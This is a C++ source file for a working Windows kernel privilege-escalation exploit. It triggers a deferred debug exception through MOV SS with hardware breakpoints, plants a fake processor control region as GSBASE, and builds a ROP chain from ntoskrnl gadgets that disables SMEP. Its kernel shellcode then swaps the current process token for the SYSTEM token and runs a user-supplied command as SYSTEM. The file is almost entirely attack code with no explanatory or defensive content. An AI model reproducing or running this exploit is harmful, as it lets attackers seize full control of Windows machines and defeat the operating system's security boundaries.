#include <iostream>
#include <Windows.h>
#include <intrin.h>
#include "KernelRoutines.h"
#include "LockedMemory.h"
#include "Native.h"
#include "Error.h"

struct ISR_STACK
{
	uint64_t RIP;
	uint64_t CS;
	uint64_t EF;
	uint64_t RSP;
};

// Doensn't really change
static const uint32_t Offset_Pcr__Self = 0x18;
static const uint32_t Offset_Pcr__CurrentPrcb = 0x20;
static const uint32_t Offset_Pcr__Prcb = 0x180;
static const uint32_t Offset_Prcb__CurrentThread = 0x8;
static const uint32_t Offset_Context__XMM13 = 0x270;
static const uint32_t MxCsr__DefVal = 0x1F80;
static const uint32_t Offset_Prcb__RspBase = 0x28;
static const uint32_t Offset_KThread__InitialStack = 0x28;
static const uint32_t Offset_Prcb__Cr8 = 0x100 + 0xA0;
static const uint32_t Offset_Prcb__Cr4 = 0x100 + 0x18;

// Requires patterns
NON_PAGED_DATA static uint32_t Offset_Prcb__Context = 0x0;                   // @KeBugCheckEx
NON_PAGED_DATA static uint32_t Offset_KThread__ApcStateFill__Process = 0x0;  // @PsGetCurrentProcess

NON_PAGED_DATA uint64_t ContextBackup[ 10 ];

NON_PAGED_DATA fnFreeCall k_PsDereferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsReferencePrimaryToken = 0;
NON_PAGED_DATA fnFreeCall k_PsGetCurrentProcess = 0;
NON_PAGED_DATA uint64_t* k_PsInitialSystemProcess = 0;

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

using fnIRetToVulnStub = void( * )( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );
NON_PAGED_DATA BYTE IRetToVulnStub[] = 
{
	0x0F, 0x22, 0xE1,		// mov cr4, rcx ; cr4 = original cr4
	0x48, 0x89, 0xD4,		// mov rsp, rdx ; stack = isr stack
	0x4C, 0x89, 0xC1,		// mov rcx, r8  ; rcx = ContextBackup
	0xFB,				// sti          ; enable interrupts
	0x48, 0x31, 0xC0,               // xor rax, rax ; lower irql to passive_level 
	0x44, 0x0F, 0x22, 0xC0,         // mov cr8, rax
	0x48, 0xCF			// iretq        ; interrupt return
};

NON_PAGED_DATA uint64_t PredictedNextRsp = 0;
NON_PAGED_DATA ptrdiff_t StackDelta = 0;

NON_PAGED_CODE void KernelShellcode()
{
	__writedr( 7, 0 );

	uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
	__writecr4( Cr4Old & ~( 1 << 20 ) );

	__swapgs();

	// Uncomment if it bugchecks to debug:
	// __writedr( 2, StackDelta );
	// __writedr( 3, PredictedNextRsp );
	// __debugbreak();
	// ^ This will let you see StackDelta and RSP clearly in a crash dump so you can check where the process went bad
	
	uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

	// Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
	while ( 
		( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
		( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
	{

		__rollback_isr( IsrStackIterator );

		// We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
		if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
		{
			/*
			fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
			fffff00e`d7a1bc40 0000000000000010 
			fffff00e`d7a1bc48 0000000000000002 
			fffff00e`d7a1bc50 fffff00ed7a1bc68 
			fffff00e`d7a1bc58 0000000000000000 
			fffff00e`d7a1bc60 0000000000000014 
			fffff00e`d7a1bc68 00007ff7e2261e95 --
			fffff00e`d7a1bc70 0000000000000033 
			fffff00e`d7a1bc78 0000000000000202 
			fffff00e`d7a1bc80 000000ad39b6f938 
			*/
			IsrStackIterator = IsrStackIterator + 0x30;
			break;
		}

		IsrStackIterator -= StackDelta;
	}


	PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
	Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );

	// ------ KERNEL CODE ------

	uint64_t SystemProcess = *k_PsInitialSystemProcess;
	uint64_t CurrentProcess = k_PsGetCurrentProcess();

	uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
	uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );

	for ( int i = 0; i < 0x500; i += 0x8 )
	{
		uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );

		if ( ( Member & ~0xF ) == CurrentToken )
		{
			*( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
			break;
		}
	}


	k_PsDereferencePrimaryToken( CurrentToken );
	k_PsDereferencePrimaryToken( SystemToken );

	// ------ KERNEL CODE ------

	__swapgs();

	( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
	( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
}

PUCHAR AllocateLockedMemoryForKernel( SIZE_T Sz )
{
	PUCHAR Va = ( PUCHAR ) VirtualAlloc( 0, Sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
	ZeroMemory( Va, Sz );
	for ( int i = 0; i < Sz; i += 0x1000 )
		Np_TryLockPage( Va + i );
	return Va;
}

int main(int argc, char *argv[])
{
	if (argc < 2){
		return 0;
	}
	// Pre-init checks: KVA Shadow
	SYSTEM_KERNEL_VA_SHADOW_INFORMATION KvaInfo = { 0 };
	if ( !NtQuerySystemInformation( SystemKernelVaShadowInformation, &KvaInfo, ( uint64_t ) sizeof( KvaInfo ), 0ull ) )
		assert( !KvaInfo.KvaShadowFlags.KvaShadowEnabled );

	// Initialization: Memory allocation, locking sections, loading nt
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
	
	assert( Np_LockSections() );
	assert( Np_TryLockPage( &__rollback_isr ) );
	assert( Np_TryLockPage( &__swapgs ) );

	KernelContext* KrCtx = Kr_InitContext();
	assert( KrCtx );

	static PUCHAR Pcr = AllocateLockedMemoryForKernel( 0x10000 );
	static PUCHAR KThread = AllocateLockedMemoryForKernel( 0x10000 );
	static PUCHAR KProcess = AllocateLockedMemoryForKernel( 0x10000 );
	static PUCHAR Prcb = Pcr + Offset_Pcr__Prcb;


	// Offsets: Finding offsets and ROP gadgets
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xB );

	PIMAGE_DOS_HEADER DosHeader = ( PIMAGE_DOS_HEADER ) KrCtx->NtLib;
	PIMAGE_NT_HEADERS FileHeader = ( PIMAGE_NT_HEADERS ) ( ( uint64_t ) DosHeader + DosHeader->e_lfanew );
	PIMAGE_SECTION_HEADER SectionHeader = ( PIMAGE_SECTION_HEADER ) ( ( ( uint64_t ) &FileHeader->OptionalHeader ) + FileHeader->FileHeader.SizeOfOptionalHeader );
	while ( _strcmpi( ( char* ) SectionHeader->Name, ".text" ) ) SectionHeader++;

	uint64_t AdrRetn = 0;
	uint64_t AdrPopRcxRetn = 0;
	uint64_t AdrSetCr4Retn = 0;

	PUCHAR NtBegin = ( PUCHAR ) KrCtx->NtLib + SectionHeader->VirtualAddress;
	PUCHAR NtEnd = NtBegin + SectionHeader->Misc.VirtualSize;

	// Find [RETN]
	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
	{
		if ( It[ 0 ] == 0xC3 )
		{
			AdrRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [POP RCX; RETN]
	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
	{
		if ( It[ 0 ] == 0x59 && It[ 1 ] == 0xC3 )
		{
			AdrPopRcxRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	// Find [MOV CR4, RCX; RETN]
	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
	{
		if ( It[ 0 ] == 0x0F && It[ 1 ] == 0x22 &&
			 It[ 2 ] == 0xE1 && It[ 3 ] == 0xC3 )
		{
			AdrSetCr4Retn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
			break;
		}
	}

	printf( "[+] [RETN]                Gadget @ %16llx\n", AdrRetn );
	printf( "[+] [POP RCX; RETN]       Gadget @ %16llx\n", AdrPopRcxRetn );
	printf( "[+] [MOV CR4, RCX; RETN]  Gadget @ %16llx\n", AdrSetCr4Retn );

	assert( AdrRetn );
	assert( AdrPopRcxRetn );
	assert( AdrSetCr4Retn );

	PUCHAR UPsGetCurrentProcess = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "PsGetCurrentProcess" );
	PUCHAR UKeBugCheckEx = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "KeBugCheckEx" );

	for ( int i = 0; i < 0x50; i++ )
	{
		if ( UKeBugCheckEx[ i ] == 0x48 && UKeBugCheckEx[ i + 1 ] == 0x8B &&  // mov rax, 
			 UKeBugCheckEx[ i + 7 ] == 0xE8 )                             // call
		{
			Offset_Prcb__Context = *( int32_t * ) ( UKeBugCheckEx + i + 3 );
			break;
		}
	}

	for ( int i = 0; i < 0x50; i++ )
	{
		if ( UPsGetCurrentProcess[ i ] == 0x48 && UPsGetCurrentProcess[ i + 1 ] == 0x8B &&  // mov rax, 
			 UPsGetCurrentProcess[ i + 7 ] == 0xC3 )                                    // retn
		{
			Offset_KThread__ApcStateFill__Process = *( int32_t * ) ( UPsGetCurrentProcess + i + 3 );
			break;
		}
	}

	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
	printf( "[+] Prcb.Context                 @ %16llx\n", Offset_Prcb__Context );
	printf( "[+] KThread.ApcStateFill.Process @ %16llx\n", Offset_KThread__ApcStateFill__Process );

	assert( Offset_Prcb__Context );
	assert( Offset_KThread__ApcStateFill__Process );

	// Setting up GSBASE
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xC );

	*( PVOID* ) ( Pcr + Offset_Pcr__Self )				= Pcr;				// Pcr.Self
	*( PVOID* ) ( Pcr + Offset_Pcr__CurrentPrcb )			= Pcr + Offset_Pcr__Prcb;	// Pcr.CurrentPrcb
	*( DWORD* ) ( Prcb )						= MxCsr__DefVal;		// Prcb.MxCsr
	*( PVOID* ) ( Prcb + Offset_Prcb__CurrentThread )		= KThread;			// Prcb.CurrentThread
	*( PVOID* ) ( Prcb + Offset_Prcb__Context )			= Prcb + 0x3000;		// Prcb.Context, Placeholder
	*( PVOID* ) ( KThread + Offset_KThread__ApcStateFill__Process ) = KProcess;			// EThread.ApcStateFill.EProcess
	*( PVOID* ) ( Prcb + Offset_Prcb__RspBase )			= (PVOID) 1;			// Prcb.RspBase
	*( PVOID* ) ( KThread + Offset_KThread__InitialStack )		= 0;				// EThread.InitialStack

	printf( "[+] Finished setting up fake PCR!\n" );
	printf( "[+] Pcr       @ %16llx\n", Pcr );
	printf( "[+] Prcb      @ %16llx\n", Prcb );
	printf( "[+] EThread   @ %16llx\n", KThread );
	printf( "[+] EProcess  @ %16llx\n", KProcess );

	NON_PAGED_DATA static DWORD SavedSS = __readss();

	// Execute Exploit!
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );

	HANDLE ThreadHandle = CreateThread( 0, 0, [ ] ( LPVOID ) -> DWORD
	{
		volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );

		while ( !Ctx->Rsp );						// Wait for RtlCaptureContext to be called once so we get leaked RSP
		uint64_t StackInitial = Ctx->Rsp;
		while ( Ctx->Rsp == StackInitial );				// Wait for it to be called another time so we get the stack pointer difference 
										// between sequential KiDebugTrapOrFault's
		StackDelta = Ctx->Rsp - StackInitial;
		PredictedNextRsp = Ctx->Rsp + StackDelta;			// Predict next RSP value when RtlCaptureContext is called
		uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;		// Predict where the return pointer will be located at
		NextRetPtrStorage &= ~0xF;
		*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;	
		                                                                // Make RtlCaptureContext write XMM13-XMM15 over it
		return 0;
	}, 0, 0, 0 );

	assert( ThreadHandle );
	printf( "\n- Created context watchdog\n" );
	printf( "- Thread Id:       %16llx\n", ( HANDLE ) GetThreadId( ThreadHandle ) );

	assert( SetThreadPriority( ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL ) );
	printf( "- Elevated priority to: THREAD_PRIORITY_TIME_CRITICAL\n" );
	SetThreadAffinityMask( ThreadHandle, 0xFFFFFFFE );
	SetThreadAffinityMask( HANDLE( -2 ), 0x00000001 );
	printf( "- Seperated exploit and context watchdog processors\n" );

	k_ExAllocatePool = KrCtx->GetProcAddress<>( "ExAllocatePool" );
	k_PsReferencePrimaryToken = KrCtx->GetProcAddress<>( "PsReferencePrimaryToken" );
	k_PsDereferencePrimaryToken = KrCtx->GetProcAddress<>( "PsDereferencePrimaryToken" );
	k_PsGetCurrentProcess = KrCtx->GetProcAddress<>( "PsGetCurrentProcess" );
	k_PsInitialSystemProcess = KrCtx->GetProcAddress<uint64_t*>( "PsInitialSystemProcess" );

	printf( "\n" );
	printf( "- PsInitialSystemProcess:     %16llx\n", k_PsInitialSystemProcess );
	printf( "- PsGetCurrentProcess:        %16llx\n", k_PsGetCurrentProcess );
	printf( "- PsReferencePrimaryToken:    %16llx\n", k_PsReferencePrimaryToken );
	printf( "- PsDereferencePrimaryToken:  %16llx\n", k_PsDereferencePrimaryToken );
	printf( "- ExAllocatePool:             %16llx\n", k_ExAllocatePool );
	printf( "\n" );

	printf( "/--------------------------------------\\\n" );
	printf( "| Press any key to start exploit!      |\n" );
	printf( "| Warning: This may bugcheck your PC.  |\n" );
	printf( "\\--------------------------------------/\n" );
	//system( "pause>nul" );
	printf( "\n" );

	CONTEXT Ctx = { 0 };
	Ctx.Dr0 = ( uint64_t ) &SavedSS;                        	// Trap SS
	Ctx.Dr1 = ( uint64_t ) Prcb + Offset_Prcb__Cr8;         	// Trap KiSaveProcessorControlState, Cr8 storage
	Ctx.Dr7 = 
		( 1 << 0 ) | ( 3 << 16 ) | ( 3 << 18 ) |	// R/W, 4 Bytes, Active
		( 1 << 2 ) | ( 3 << 20 ) | ( 2 << 22 );		// W,   8 Bytes,  Active
	Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

	printf( "[+] Setting up debug registers:\n" );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
	printf( "Dr0:    %16llx [@SavedSS]              (R/W, 4 Bytes, Active)\n", Ctx.Dr0 );
	printf( "Dr1:    %16llx [@SpecialRegisters.CR4] (W,   8 Bytes, Active)\n", Ctx.Dr1 );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
	assert( SetThreadContext( HANDLE( -2 ), &Ctx ) );
	printf( "\n" );

	uint64_t RetnRetn[ 2 ] = { AdrRetn, AdrRetn };
	uint64_t PopRcxRetnRcx[ 2 ] = { AdrPopRcxRetn, 0x506f8 };
	uint64_t SetCr4Retn[ 2 ] = { AdrSetCr4Retn, ( uint64_t ) &KernelShellcode };

	// RSP:
	__setxmm13( ( BYTE* ) RetnRetn );		// &retn	// we need to align xmm writes so two place holders just incase!
							// &retn
	__setxmm14( ( BYTE* ) PopRcxRetnRcx );		// &pop rcx
							// 0x506f8
	__setxmm15( ( BYTE* ) SetCr4Retn );		// &mov cr4, rcx; retn
							// &KernelShellcode

	printf( "[+] Built ROP Chain:\n" );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
	printf( "-- &retn;                (%016llx)\n", RetnRetn[ 0 ] );
	printf( "-- &retn;                (%016llx)\n", RetnRetn[ 1 ] );
	printf( "-- &pop rcx; retn;       (%016llx)\n", PopRcxRetnRcx[ 0 ] );
	printf( "-- cr4_nosmep            (%016llx)\n", PopRcxRetnRcx[ 1 ] );
	printf( "-- &mov cr4, rcx; retn;  (%016llx)\n", SetCr4Retn[ 0 ] );
	printf( "-- &KernelShellcode      (%016llx)\n", SetCr4Retn[ 1 ] );
	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
	printf( "\n" );


	PVOID ProperGsBase = __read_gs_base();
	printf( "[+] Writing fake PCR as new GSBASE:  %16llx\n", Pcr );
	printf( "[+] Defering debug exception...\n" );
	__set_gs_base( Pcr );
	__triggervuln( ContextBackup, &SavedSS ); // Let the fun begin
	__set_gs_base( ProperGsBase );
	printf( "[+] Restored old GSBASE:             %16llx\n", ProperGsBase );

	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
	printf( "[+] Exploit successful!\n\n" );


	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
	printf( "/------------------------------------------\\\n" );
	printf( "| Press any key to launch a system console |\n" );
	printf( "\\------------------------------------------/" );
	//system( "pause>nul" );
	system( argv[1] );
}
